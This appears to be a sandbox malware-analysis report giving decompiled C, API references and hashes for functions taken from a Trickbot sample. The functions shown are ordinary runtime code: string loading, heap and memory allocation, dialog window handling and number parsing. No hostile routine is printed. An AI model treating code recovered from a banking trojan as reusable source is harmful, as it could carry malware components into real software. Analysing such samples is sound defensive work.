Opcode ID: 969d4de4ea3e90b132ee8ca80b47fd874543e8384f09df8b19c95960b31900ac
Instruction ID: 8cf7ecafdeaf0c82610319afc59b0982b9bef6098c3676b10efa0426e02d170f
Opcode Fuzzy Hash: 969d4de4ea3e90b132ee8ca80b47fd874543e8384f09df8b19c95960b31900ac
Instruction Fuzzy Hash: AB116070E102299BDB24DF65C885BEDB374FF04324F60466FE412A72D2DB78A905CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0041C702, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C702(int _a4, CHAR* _a8, int _a12) {
				void* _t5;
				signed char _t7;
				CHAR* _t8;

				_t5 = E00432562();
				_t8 = _a8;
				_t7 = LoadStringA( *(_t5 + 0xc), _a4, _t8, _a12); // executed
				if(_t7 == 0) {
					 *_t8 =  *_t8 & _t7;
					return _t7;
				}
				return _t7;
			}

0x0041c703
0x0041c70c
0x0041c719
0x0041c721
0x0041c723
0x00000000
0x0041c723
0x0041c726

APIs

LoadStringA.USER32(?,?,?,?), ref: 0041C719

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: cd648bb8801f5ce69027542f20f9688bdab783a13e9f5cb9fcb40dc2325105fa
Instruction ID: 9fef43086a5915e305f224032a7071d800dac95307d7e0d59c0f201a383442f6
Opcode Fuzzy Hash: cd648bb8801f5ce69027542f20f9688bdab783a13e9f5cb9fcb40dc2325105fa
Instruction Fuzzy Hash: 3AD0A7720083629BC701DF51CC04C8FBBA4BF58350F048C0EF49083151C364CD44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004088E9, Relevance: 1.3, APIs: 1, Instructions: 85
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004088E9(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _t45;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t54;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				void* _t69;
				void* _t70;
				void* _t77;
				signed int _t78;
				intOrPtr _t81;

				_t60 = _a4;
				_t81 =  *((intOrPtr*)(_t60 + 0x10));
				_t45 =  *(_t60 + 8);
				_t57 = 0;
				while(_t45 >= 0) {
					_t45 = _t45 << 1;
					_t57 = _t57 + 1;
				}
				_t69 = 0x3f;
				_t48 = _t57 * 0x204 + _t81 + 0x144;
				_v8 = _t48;
				do {
					 *((intOrPtr*)(_t48 + 8)) = _t48;
					 *((intOrPtr*)(_t48 + 4)) = _t48;
					_t48 = _t48 + 8;
					_t69 = _t69 - 1;
				} while (_t69 != 0);
				_t77 = (_t57 << 0xf) +  *((intOrPtr*)(_t60 + 0xc));
				_t49 = VirtualAlloc(_t77, 0x8000, 0x1000, 4); // executed
				if(_t49 != 0) {
					_t70 = _t77 + 0x7000;
					if(_t77 <= _t70) {
						_t55 = _t77 + 0x10;
						do {
							 *(_t55 - 8) =  *(_t55 - 8) | 0xffffffff;
							 *(_t55 + 0xfec) =  *(_t55 + 0xfec) | 0xffffffff;
							 *((intOrPtr*)(_t55 - 4)) = 0xff0;
							 *_t55 = _t55 + 0xffc;
							 *((intOrPtr*)(_t55 + 4)) = _t55 - 0x1004;
							 *((intOrPtr*)(_t55 + 0xfe8)) = 0xff0;
							_t55 = _t55 + 0x1000;
						} while (_t55 - 0x10 <= _t70);
					}
					_t61 = _t77 + 0xc;
					_t51 = _v8 + 0x1f8;
					_t78 = 1;
					 *((intOrPtr*)(_t51 + 4)) = _t61;
					 *((intOrPtr*)(_t61 + 8)) = _t51;
					_t62 = _t70 + 0xc;
					 *((intOrPtr*)(_t51 + 8)) = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t51;
					 *(_t81 + 0x44 + _t57 * 4) =  *(_t81 + 0x44 + _t57 * 4) & 0x00000000;
					 *(_t81 + 0xc4 + _t57 * 4) = _t78;
					_t52 =  *((intOrPtr*)(_t81 + 0x43));
					_t53 = _a4;
					 *((char*)(_t81 + 0x43)) = _t52 + 1;
					if(_t52 == 0) {
						 *(_t53 + 4) =  *(_t53 + 4) | _t78;
					}
					 *(_t53 + 8) =  *(_t53 + 8) &  !(0x80000000 >> _t57);
					_t54 = _t57;
				} else {
					_t54 = _t49 | 0xffffffff;
				}
				return _t54;
			}

0x004088ed
0x004088f3
0x004088f6
0x004088f9
0x004088fb
0x004088ff
0x00408901
0x00408901
0x0040890e
0x0040890f
0x00408916
0x00408919
0x00408919
0x0040891c
0x0040891f
0x00408922
0x00408922
0x0040892c
0x0040893a
0x00408942
0x0040894c
0x00408954
0x00408956
0x00408959
0x00408959
0x0040895d
0x0040896a
0x00408971
0x00408979
0x0040897c
0x00408986
0x0040898e
0x00408959
0x00408995
0x00408998
0x0040899f
0x004089a0
0x004089a3
0x004089a6
0x004089a9
0x004089ac
0x004089af
0x004089b4
0x004089bb
0x004089c4
0x004089c7
0x004089ca
0x004089cc
0x004089cc
0x004089da
0x004089dd
0x00408944
0x00408944
0x00408944
0x004089e3

APIs

VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,?,00000000,000000E0,00402EA0,?,0040860F,000000E0,?,j/@,00000000,000000E0,0040512A), ref: 0040893A

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c8c4f3bc6aad0600f3f1aa4a2393a0103a408dc92c21fc2dd2a8546f36144c37
Instruction ID: c82468483a2187fc3a5fc2f4c2d09b69639984f2eedcedc64d0915c61d419481
Opcode Fuzzy Hash: c8c4f3bc6aad0600f3f1aa4a2393a0103a408dc92c21fc2dd2a8546f36144c37
Instruction Fuzzy Hash: CC319C716016069FD314CF19C984BA5BBE4FB50368F24C2BED1998B3E2DB74D906CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00406991, Relevance: 1.3, APIs: 1, Instructions: 56
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E00406991(signed int _a4, signed int _a8) {
				void* _t8;
				long _t11;
				void* _t13;
				long _t15;
				void* _t17;
				void* _t23;

				_t15 = _a4 * _a8;
				_t11 = _t15;
				if(_t15 <= 0xffffffe0) {
					if(_t15 == 0) {
						_t15 = 1;
					}
					_t15 = _t15 + 0x0000000f & 0xfffffff0;
				}
				while(1) {
					_t13 = 0;
					if(_t15 > 0xffffffe0) {
						goto L8;
					}
					_t23 = _t11 -  *0x4482f4; // 0x3f8
					if(_t23 > 0) {
						L7:
						_t13 = HeapAlloc( *0x44d0bc, 8, _t15);
						if(_t13 != 0) {
							L12:
							return _t13;
						}
						goto L8;
					}
					E00408042(9);
					_push(_t11); // executed
					_t8 = E0040852F(); // executed
					_t13 = _t8;
					E004080A3(9);
					_t17 = _t17 + 0xc;
					if(_t13 != 0) {
						E00405360(_t13, 0, _t11);
						goto L12;
					}
					goto L7;
					L8:
					if( *0x44b838 == 0) {
						goto L12;
					}
					if(E00408144(_t15) == 0) {
						return 0;
					}
				}
			}

0x00406998
0x004069a0
0x004069a2
0x004069a6
0x004069aa
0x004069aa
0x004069ae
0x004069ae
0x004069b1
0x004069b1
0x004069b6
0x00000000
0x00000000
0x004069b8
0x004069be
0x004069dd
0x004069ec
0x004069f0
0x00406a14
0x00000000
0x00406a14
0x00000000
0x004069f0
0x004069c2
0x004069c7
0x004069c8
0x004069cf
0x004069d1
0x004069d6
0x004069db
0x00406a0c
0x00000000
0x00406a11
0x00000000
0x004069f2
0x004069f9
0x00000000
0x00000000
0x00406a04
0x00000000
0x00406a1a
0x00406a06

APIs

HeapAlloc.KERNEL32(00000008,?,?,?,?,00407ACB,00000001,00000074,?,00405217), ref: 004069E6

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 2d08122dd1fc9ab41293eabcec79aebafa58a37ac51ae7e424350b79346dea07
Instruction ID: 93862fe949f06c54fae9554ead81b105e4667d7303a418b5c2638b7a98b0af10
Opcode Fuzzy Hash: 2d08122dd1fc9ab41293eabcec79aebafa58a37ac51ae7e424350b79346dea07
Instruction Fuzzy Hash: 97012876A0161066D62173296D41B5B2248DBC27B4F1B013BFD927B3C2DE7C4C114AAE

Uniqueness

Uniqueness Score: -1.00%

Function 0043291C, Relevance: 1.3, APIs: 1, Instructions: 11
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0043291C(long _a4) {
				void* _t2;
				void* _t5;
				void* _t6;

				_t2 = LocalAlloc(0x40, _a4); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					E0041564B(_t5);
				}
				return _t6;
			}

0x00432923
0x00432929
0x0043292d
0x0043292f
0x0043292f
0x00432937

APIs

LocalAlloc.KERNELBASE(00000040,?,0044B4A0,00432B8E,00000010,?,0044B4A0,?,00432DBE,0044B2EC,00000000,?,00000000,00432571,00430506,0043258D), ref: 00432923

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 4a5d0132e9d322bddd1c5f80f20e1722597d946fcc7e9ff7c610445913ff9419
Instruction ID: dcf9de0bfcca85a356b4dcada8d64168c54f749efa90ccddd610f9377d1e5536
Opcode Fuzzy Hash: 4a5d0132e9d322bddd1c5f80f20e1722597d946fcc7e9ff7c610445913ff9419
Instruction Fuzzy Hash: 8EC08C72601932A7C62223949905BCB7A808F647A0F021462FB4996220C664CC4082E9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00411AF0, Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 298
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00411AF0(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				void* __ebx;
				void* __esi;
				_Unknown_base(*)()* _t52;
				signed int _t53;
				_Unknown_base(*)()* _t55;
				_Unknown_base(*)()* _t57;
				_Unknown_base(*)()* _t59;
				long _t62;
				signed char _t64;
				signed char _t70;
				void* _t78;
				int _t79;
				void* _t87;
				int _t88;
				signed char _t89;
				struct HWND__* _t90;
				long _t92;

				_t87 = __edx;
				_t100 =  &_v24;
				_t88 = _a8;
				_t106 = _t88 - 0x82;
				if(_t88 != 0x82) {
					_t90 = _a4;
					__eflags = GetPropA(_t90, 0);
					if(__eflags == 0) {
						__eflags = _t88 - 0x86;
						if(_t88 > 0x86) {
							__eflags = _t88 - 0x138;
							if(_t88 > 0x138) {
								__eflags = _t88 - 0x1943;
								if(__eflags < 0) {
									goto L7;
								} else {
									__eflags = _t88 - 0x1944;
									if(__eflags <= 0) {
										 *_a16 = 1;
										return 0x3ee;
									} else {
										goto L7;
									}
								}
							} else {
								__eflags = _t88 - 0x132;
								if(_t88 >= 0x132) {
									GetClassNameA(_t90,  &_v16, 0x10);
									__eflags = lstrcmpA("#32770",  &_v16);
									if(__eflags == 0) {
										_t52 = GetWindowLongA(_t90, 4);
										__eflags = _t52;
										if(_t52 != 0) {
											__eflags = _t52 - 0xffff0000;
											if(_t52 <= 0xffff0000) {
												L40:
												_t92 = _a16;
												_t79 = _a12;
												_t53 = CallWindowProcA(_t52, _t90, _t88, _t79, _t92);
												__eflags = _t53;
												if(__eflags == 0) {
													L42:
													_t55 = E00410610(__eflags, _t90, 6);
													_t100 = _t100 + 8;
													_t52 = CallWindowProcA(_t55, _t90, _t88 + 0xcbf, _t79, _t92);
													__eflags = _t52;
													if(_t52 == 0) {
														goto L44;
													} else {
														__eflags = _t52 - 1;
														if(_t52 == 1) {
															goto L44;
														}
													}
												} else {
													__eflags = _t53 - 1;
													if(__eflags == 0) {
														goto L42;
													}
												}
											} else {
												__eflags =  *0x44d360 - 0x30a;
												if(__eflags > 0) {
													goto L40;
												} else {
													_t92 = _a16;
													_t79 = _a12;
													_t57 = E00410610(__eflags, _t90, 6);
													_t100 =  &_v24 + 8;
													_t52 = CallWindowProcA(_t57, _t90, _t88 + 0xcbf, _t79, _t92);
													__eflags = _t52;
													if(_t52 == 0) {
														goto L44;
													} else {
														__eflags = _t52 - 1;
														if(_t52 == 1) {
															goto L44;
														}
													}
												}
											}
										} else {
											_t92 = _a16;
											_t79 = _a12;
											_push(_t92);
											goto L45;
										}
									} else {
										_t92 = _a16;
										_t79 = _a12;
										_t59 = E00410610(__eflags, _t90, 6);
										_t100 =  &_v24 + 8;
										_t52 = CallWindowProcA(_t59, _t90, _t88 + 0xcbf, _t79, _t92);
										__eflags = _t52;
										if(_t52 == 0) {
											L44:
											_push(_t92);
											L45:
											_push(_t79);
											_push(_t88);
											_t52 = E00411280(_t52, _t87, _t90);
										} else {
											__eflags = _t52 - 1;
											if(_t52 == 1) {
												goto L44;
											}
										}
									}
									__eflags = _t52;
									if(__eflags == 0) {
										goto L8;
									} else {
										return _t52;
									}
								} else {
									__eflags = _t88 - 0x110;
									if(__eflags == 0) {
										_v20 = E00410610(__eflags, _t90, 6);
										__eflags =  *0x44d360 - 0x35f;
										if( *0x44d360 < 0x35f) {
											L22:
											_v24 = 1;
										} else {
											_t70 = GetWindowLongA(_t90, 0xfffffff0);
											_v24 = 0;
											__eflags = _t70 & 0x00000004;
											if((_t70 & 0x00000004) == 0) {
												goto L22;
											}
										}
										_t62 = SendMessageA(_t90, 0x11f0, 0,  &_v24);
										__eflags = _v24;
										if(_v24 != 0) {
											_t80 = _a12;
											_t64 = CallWindowProcA(_v20, _t90, _t88, _a12, _a16);
											__eflags =  *0x44d360 - 0x35f;
											_t89 = _t64;
											if( *0x44d360 < 0x35f) {
												L27:
												E00411190(_t64, _t80, _t87, _t90, 0xffff);
											} else {
												_t64 = GetWindowLongA(_t90, 0xfffffff0);
												__eflags = _t64 & 0x00000004;
												if((_t64 & 0x00000004) == 0) {
													goto L27;
												}
											}
											return _t89;
										} else {
											E00410F40(_t62, _t78, _t87, _t90);
											return CallWindowProcA(_v24, _t90, _t88, _a8, _a12);
										}
									} else {
										goto L7;
									}
								}
							}
						} else {
							__eflags = _t88 - 0x85;
							if(_t88 >= 0x85) {
								L16:
								__eflags =  *0x44d360 - 0x35f;
								if(__eflags >= 0) {
									L19:
									return CallWindowProcA(E00410610(__eflags, _t90, 6), _t90, _t88, _a12, _a16);
								} else {
									__eflags = IsIconic(_t90);
									if(__eflags != 0) {
										goto L19;
									} else {
										return E00411340(_t90, _t88, _a12, _a16, 0);
									}
								}
							} else {
								__eflags = _t88 - 0xc;
								if(__eflags == 0) {
									goto L16;
								} else {
									L7:
									_t79 = _a12;
									_t92 = _a16;
									L8:
									return CallWindowProcA(E00410610(__eflags, _t90, 6), _t90, _t88, _t79, _t92);
								}
							}
						}
					} else {
						return CallWindowProcA(E00410610(__eflags, _t90, 6), _t90, _t88, _a12, _a16);
					}
				} else {
					return E00410840(_t106, _a4, _t88, _a12, _a16, 6);
				}
			}

0x00411af0
0x00411af0
0x00411af7
0x00411afb
0x00411b01
0x00411b29
0x00411b3b
0x00411b3d
0x00411b67
0x00411b6d
0x00411ba4
0x00411baa
0x00411bc2
0x00411bc8
0x00000000
0x00411bca
0x00411bca
0x00411bd0
0x00411e0f
0x00411e1d
0x00411bd6
0x00000000
0x00411bd6
0x00411bd0
0x00411bac
0x00411bac
0x00411bb2
0x00411cfb
0x00411d11
0x00411d13
0x00411d52
0x00411d58
0x00411d5a
0x00411d6a
0x00411d6f
0x00411dab
0x00411dab
0x00411daf
0x00411db8
0x00411dbe
0x00411dc0
0x00411dc7
0x00411dd4
0x00411dd9
0x00411ddd
0x00411de3
0x00411de5
0x00000000
0x00411de7
0x00411de7
0x00411dea
0x00000000
0x00000000
0x00411dea
0x00411dc2
0x00411dc2
0x00411dc5
0x00000000
0x00000000
0x00411dc5
0x00411d71
0x00411d71
0x00411d7a
0x00000000
0x00411d7c
0x00411d7c
0x00411d80
0x00411d91
0x00411d96
0x00411d9a
0x00411da0
0x00411da2
0x00000000
0x00411da4
0x00411da4
0x00411da7
0x00000000
0x00411da9
0x00411da7
0x00411da2
0x00411d7a
0x00411d5c
0x00411d5c
0x00411d60
0x00411d64
0x00000000
0x00411d64
0x00411d15
0x00411d15
0x00411d19
0x00411d2a
0x00411d2f
0x00411d33
0x00411d39
0x00411d3b
0x00411dec
0x00411dec
0x00411ded
0x00411ded
0x00411dee
0x00411def
0x00411d41
0x00411d41
0x00411d44
0x00000000
0x00411d4a
0x00411d44
0x00411d3b
0x00411df4
0x00411df6
0x00000000
0x00411e03
0x00411e03
0x00411e03
0x00411bb8
0x00411bb8
0x00411bbe
0x00411c3b
0x00411c42
0x00411c4b
0x00411c62
0x00411c62
0x00411c4d
0x00411c50
0x00411c56
0x00411c5e
0x00411c60
0x00000000
0x00000000
0x00411c60
0x00411c77
0x00411c7d
0x00411c82
0x00411caf
0x00411cbc
0x00411cc2
0x00411ccb
0x00411ccd
0x00411cdc
0x00411ce2
0x00411ccf
0x00411cd2
0x00411cd8
0x00411cda
0x00000000
0x00000000
0x00411cda
0x00411cf0
0x00411c84
0x00411c85
0x00411ca8
0x00411ca8
0x00411bc0
0x00000000
0x00411bc0
0x00411bbe
0x00411bb2
0x00411b6f
0x00411b6f
0x00411b75
0x00411bd8
0x00411bd8
0x00411be1
0x00411c0b
0x00411c30
0x00411be3
0x00411bea
0x00411bec
0x00000000
0x00411bee
0x00411c08
0x00411c08
0x00411bec
0x00411b77
0x00411b77
0x00411b7a
0x00000000
0x00411b7c
0x00411b7c
0x00411b7c
0x00411b80
0x00411b84
0x00411ba1
0x00411ba1
0x00411b7a
0x00411b75
0x00411b3f
0x00411b64
0x00411b64
0x00411b03
0x00411b24
0x00411b24

APIs

GetPropA.USER32(?,00000000), ref: 00411B35
CallWindowProcA.USER32(00000000), ref: 00411B57

Part of subcall function 00410840: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 00410866
Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041087E
Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041088A

Strings

#32770, xrefs: 00411D06

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID: #32770
API String ID: 2276450057-463685578
Opcode ID: 78d62eab1a013060756a189334512b458c10be6afb0ca5f9fe7f6207079f0ea7
Instruction ID: 385f296229117b5dd7e49720c0eb5d2d8c0126a1149772ac2821be927c84e00f
Opcode Fuzzy Hash: 78d62eab1a013060756a189334512b458c10be6afb0ca5f9fe7f6207079f0ea7
Instruction Fuzzy Hash: 4481E6367053047BD620AB11EC84FDF776CEB85765F40082BFB01822A1E769ADD586BA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C442, Relevance: 26.7, Strings: 21, Instructions: 417
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0040C442(signed int* _a4, intOrPtr* _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28) {
				signed int _v8;
				char _v12;
				signed char* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v58;
				signed int _v62;
				signed int _v66;
				signed int _v68;
				char _v73;
				char _v96;
				signed int _t121;
				intOrPtr _t141;
				intOrPtr _t143;
				signed int _t146;
				intOrPtr* _t148;

				_t148 = _a12;
				_v16 =  &_v96;
				_t121 = 0;
				_t146 = 1;
				_v44 = 0;
				_v28 = _t146;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v36 = 0;
				_v48 = 0;
				_v52 = 0;
				_v32 = 0;
				_v12 = 0;
				_v24 = 0;
				_a12 = _t148;
				L1:
				_t143 =  *_t148;
				if(_t143 == 0x20 || _t143 == 9 || _t143 == 0xa || _t143 == 0xd) {
					_t148 = _t148 + 1;
					goto L1;
				}
				_push(4);
				while(1) {
					L7:
					_t141 =  *_t148;
					_t148 = _t148 + 1;
					if(_t121 > 0xb) {
						break;
					}
					switch( *((intOrPtr*)(_t121 * 4 +  &M0040C8E3))) {
						case 0:
							__eflags = _t141 - 0x31;
							if(_t141 < 0x31) {
								L12:
								__eflags = _t141 -  *0x448650; // 0x2e
								if(__eflags != 0) {
									_t137 = _t141 - 0x2b;
									__eflags = _t137;
									if(_t137 == 0) {
										_v44 = _v44 & 0x00000000;
										_push(2);
										_pop(_t121);
										goto L7;
									}
									_t139 = _t137;
									__eflags = _t139;
									if(_t139 == 0) {
										_push(2);
										_v44 = 0x8000;
										_pop(_t121);
										goto L7;
									}
									__eflags = _t139 != 3;
									if(_t139 != 3) {
										goto L109;
									}
									goto L36;
								}
								goto L13;
							}
							__eflags = _t141 - 0x39;
							if(_t141 > 0x39) {
								goto L12;
							}
							goto L11;
						case 1:
							__eflags = __bl - 0x31;
							_v20 = __edx;
							if(__bl < 0x31) {
								L22:
								__eflags = __bl -  *0x448650; // 0x2e
								if(__eflags == 0) {
									goto L47;
								}
								__eflags = __bl - 0x2b;
								if(__bl == 0x2b) {
									goto L31;
								}
								__eflags = __bl - 0x2d;
								if(__bl == 0x2d) {
									goto L31;
								}
								__eflags = __bl - 0x30;
								if(__bl == 0x30) {
									goto L36;
								}
								goto L26;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								goto L11;
							}
							goto L22;
						case 2:
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								L34:
								__eflags = __bl -  *0x448650; // 0x2e
								if(__eflags == 0) {
									L13:
									_push(5);
									goto L90;
								}
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									goto L94;
								}
								L36:
								_t121 = _t146;
								goto L7;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								L11:
								_push(3);
								goto L81;
							}
							goto L34;
						case 3:
							_v20 = __edx;
							while(1) {
								__eflags =  *0x44864c - __edx; // 0x1
								if(__eflags <= 0) {
									__ecx =  *0x448440; // 0x44844a
									__eax = __bl & 0x000000ff;
									__eax = __bl & 0x000000ff & __esi;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E00409B5F(__ecx, __esi, __bl & 0x000000ff, __esi);
									_pop(__ecx);
									_pop(__ecx);
									_push(1);
									_pop(__edx);
								}
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__eflags = _v8 - 0x19;
								if(_v8 >= 0x19) {
									_t31 =  &_v12;
									 *_t31 = _v12 + 1;
									__eflags =  *_t31;
								} else {
									__eax = _v16;
									_v8 = _v8 + 1;
									__bl = __bl - 0x30;
									_v16 =  &(_v16[1]);
									 *_v16 = __bl;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							__eflags = __bl -  *0x448650; // 0x2e
							if(__eflags != 0) {
								goto L58;
							}
							L47:
							__eax = __esi;
							goto L7;
						case 4:
							__eflags = _v8;
							_v20 = __edx;
							_v40 = __edx;
							if(_v8 != 0) {
								while(1) {
									L51:
									__eflags =  *0x44864c - __edx; // 0x1
									if(__eflags <= 0) {
										__ecx =  *0x448440; // 0x44844a
										__eax = __bl & 0x000000ff;
										__eax = __bl & 0x000000ff & __esi;
										__eflags = __eax;
									} else {
										__eax = __bl & 0x000000ff;
										__eax = E00409B5F(__ecx, __esi, __bl & 0x000000ff, __esi);
										_pop(__ecx);
										_pop(__ecx);
										_push(1);
										_pop(__edx);
									}
									__eflags = __eax;
									if(__eax == 0) {
										break;
									}
									__eflags = _v8 - 0x19;
									if(_v8 < 0x19) {
										__eax = _v16;
										_v8 = _v8 + 1;
										__bl = __bl - 0x30;
										_v16 =  &(_v16[1]);
										_t46 =  &_v12;
										 *_t46 = _v12 - 1;
										__eflags =  *_t46;
										 *_v16 = __bl;
									}
									__bl =  *__edi;
									__edi = __edi + 1;
								}
								L58:
								__eflags = __bl - 0x2b;
								if(__bl == 0x2b) {
									L31:
									__edi = __edi - 1;
									_push(0xb);
									goto L90;
								}
								__eflags = __bl - 0x2d;
								if(__bl == 0x2d) {
									goto L31;
								}
								L26:
								__eflags = __bl - 0x43;
								if(__bl <= 0x43) {
									goto L109;
								}
								__eflags = __bl - 0x45;
								if(__bl <= 0x45) {
									L30:
									_push(6);
									goto L90;
								}
								__eflags = __bl - 0x63;
								if(__bl <= 0x63) {
									goto L109;
								}
								__eflags = __bl - 0x65;
								if(__bl > 0x65) {
									goto L109;
								}
								goto L30;
							} else {
								goto L49;
							}
							while(1) {
								L49:
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									goto L51;
								}
								_v12 = _v12 - 1;
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							goto L51;
						case 5:
							__eflags =  *0x44864c - __edx;
							_v40 = __edx;
							if( *0x44864c <= __edx) {
								__ecx =  *0x448440; // 0x44844a
								__eax = __bl & 0x000000ff;
								__eax = __bl & 0x000000ff & __esi;
								__eflags = __eax;
							} else {
								__eax = __bl & 0x000000ff;
								__eax = E00409B5F(__ecx, __esi, __bl & 0x000000ff, __esi);
								_pop(__ecx);
								_pop(__ecx);
								_push(1);
								_pop(__edx);
							}
							__eflags = __eax;
							if(__eax == 0) {
								goto L94;
							} else {
								__eax = __esi;
								goto L82;
							}
						case 6:
							_t51 = __edi - 2; // 0x0
							__ecx = _t51;
							__eflags = __bl - 0x31;
							_a12 = __ecx;
							if(__bl < 0x31) {
								L68:
								__eax = __bl;
								__eax = __bl - 0x2b;
								__eflags = __eax;
								if(__eax == 0) {
									goto L89;
								}
								__eax = __eax - 1;
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L88;
								}
								__eax = __eax - 3;
								__eflags = __eax;
								if(__eax != 0) {
									goto L110;
								}
								goto L71;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								goto L80;
							}
							goto L68;
						case 7:
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								L83:
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									L94:
									__edi = _a12;
									goto L111;
								}
								L71:
								_push(8);
								goto L90;
							}
							__eflags = __bl - 0x39;
							if(__bl > 0x39) {
								goto L83;
							}
							goto L80;
						case 8:
							_v36 = __edx;
							while(1) {
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									break;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								goto L109;
							}
							__eflags = __bl - 0x39;
							if(__bl > 0x39) {
								goto L109;
							}
							L80:
							_push(9);
							L81:
							_pop(_t121);
							L82:
							_t148 = _t148 - 1;
							goto L7;
						case 9:
							_v36 = 1;
							__esi = 0;
							__eflags = 0;
							while(1) {
								__eflags =  *0x44864c - 1;
								if( *0x44864c <= 1) {
									__ecx =  *0x448440; // 0x44844a
									__eax = __bl & 0x000000ff;
									__eax = __bl & 4;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E00409B5F(__ecx, __esi, __bl & 0x000000ff, 4);
									_pop(__ecx);
									_pop(__ecx);
								}
								__eflags = __eax;
